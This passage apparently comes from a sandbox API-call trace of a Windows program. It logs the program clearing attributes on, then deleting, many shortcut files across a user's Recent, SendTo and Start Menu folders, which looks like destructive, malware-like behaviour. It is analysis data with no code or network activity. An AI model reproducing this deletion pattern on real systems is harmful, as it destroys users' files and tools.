lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.111] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Ybe-Z0KppscUK65Fq.lnk", dwFileAttributes=0x80) returned 1 [0151.112] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Ybe-Z0KppscUK65Fq.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ybe-z0kppscuk65fq.lnk")) returned 1 [0151.114] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.119] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yDh2e.lnk", dwFileAttributes=0x80) returned 1 [0151.121] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yDh2e.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ydh2e.lnk")) returned 1 [0151.124] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.129] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yEnZ2ZSRdLcOQzDKRLd.lnk", dwFileAttributes=0x80) returned 1 [0151.130] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yEnZ2ZSRdLcOQzDKRLd.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\yenz2zsrdlcoqzdkrld.lnk")) returned 1 [0151.133] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.138] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YG7ISF.lnk", dwFileAttributes=0x80) returned 1 [0151.138] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\YG7ISF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\yg7isf.lnk")) returned 1 [0151.141] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.146] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yns RT1bYvb6rGU.lnk", dwFileAttributes=0x80) returned 1 [0151.146] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yns RT1bYvb6rGU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\yns rt1byvb6rgu.lnk")) returned 1 [0151.150] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.156] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yX4J4Rf9QFu.lnk", dwFileAttributes=0x80) returned 1 [0151.156] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\yX4J4Rf9QFu.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\yx4j4rf9qfu.lnk")) returned 1 [0151.159] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.164] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zm6KG6jG4BjhumSNNOz.lnk", dwFileAttributes=0x80) returned 1 [0151.165] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zm6KG6jG4BjhumSNNOz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zm6kg6jg4bjhumsnnoz.lnk")) returned 1 [0151.168] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.173] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zMlFUJyJW.ots.lnk", dwFileAttributes=0x80) returned 1 [0151.173] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zMlFUJyJW.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zmlfujyjw.ots.lnk")) returned 1 [0151.176] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.181] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_N479LXGNf.lnk", dwFileAttributes=0x80) returned 1 [0151.181] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_N479LXGNf.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_n479lxgnf.lnk")) returned 1 [0151.184] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.189] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_PzZ.flv.lnk", dwFileAttributes=0x80) returned 1 [0151.190] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_PzZ.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\_pzz.flv.lnk")) returned 1 [0151.193] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.193] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.193] CoTaskMemFree (pv=0x508980) [0151.194] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.194] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.194] CoTaskMemFree (pv=0x508980) [0151.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.197] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.197] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.197] CoTaskMemFree (pv=0x508980) [0151.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.210] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0151.217] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk", dwFileAttributes=0x80) returned 1 [0151.217] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\fax recipient.lnk")) returned 1 [0151.221] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.221] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.221] CoTaskMemFree (pv=0x508980) [0151.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.222] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.222] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.222] CoTaskMemFree (pv=0x508980) [0151.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.223] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0151.229] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk", dwFileAttributes=0x80) returned 1 [0151.229] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer (64-bit).lnk")) returned 1 [0151.232] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0151.240] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk", dwFileAttributes=0x80) returned 1 [0151.240] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\internet explorer.lnk")) returned 1 [0151.243] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.243] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.243] CoTaskMemFree (pv=0x508980) [0151.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.246] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0151.253] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk", dwFileAttributes=0x80) returned 1 [0151.254] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\command prompt.lnk")) returned 1 [0151.259] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0151.267] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk", dwFileAttributes=0x80) returned 1 [0151.267] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Notepad.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\notepad.lnk")) returned 1 [0151.270] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0151.275] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk", dwFileAttributes=0x80) returned 1 [0151.276] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\run.lnk")) returned 1 [0151.280] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0151.285] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk", dwFileAttributes=0x80) returned 1 [0151.286] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\windows explorer.lnk")) returned 1 [0151.288] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.288] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.289] CoTaskMemFree (pv=0x508980) [0151.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.290] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0151.297] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk", dwFileAttributes=0x80) returned 1 [0151.297] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk")) returned 1 [0151.300] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0151.306] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk", dwFileAttributes=0x80) returned 1 [0151.307] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Magnify.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\magnify.lnk")) returned 1 [0151.310] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0151.316] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk", dwFileAttributes=0x80) returned 1 [0151.317] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\Narrator.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\narrator.lnk")) returned 1 [0151.320] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0151.327] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk", dwFileAttributes=0x80) returned 1 [0151.327] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\On-Screen Keyboard.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\accessibility\\on-screen keyboard.lnk")) returned 1 [0151.330] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.330] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.330] CoTaskMemFree (pv=0x508980) [0151.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.331] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0151.337] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk", dwFileAttributes=0x80) returned 1 [0151.337] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\computer.lnk")) returned 1 [0151.341] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0151.346] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk", dwFileAttributes=0x80) returned 1 [0151.347] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\control panel.lnk")) returned 1 [0151.350] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0151.356] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk", dwFileAttributes=0x80) returned 1 [0151.356] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Internet Explorer (No Add-ons).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\internet explorer (no add-ons).lnk")) returned 1 [0151.359] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c | out: lpFreeBytesAvailableToCaller=0x2af02c, lpTotalNumberOfBytes=0x2af024, lpTotalNumberOfFreeBytes=0x2af01c) returned 1 [0151.365] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk", dwFileAttributes=0x80) returned 1 [0151.366] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Private Character Editor.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\private character editor.lnk")) returned 1 [0151.368] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.368] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.369] CoTaskMemFree (pv=0x508980) [0151.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.369] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.370] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.371] CoTaskMemFree (pv=0x508980) [0151.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.372] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0151.378] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk", dwFileAttributes=0x80) returned 1 [0151.379] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Help.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\maintenance\\help.lnk")) returned 1 [0151.383] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.383] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0151.383] CoTaskMemFree (pv=0x508980) [0151.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.384] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0151.384] GetSystemDirectoryW (in: 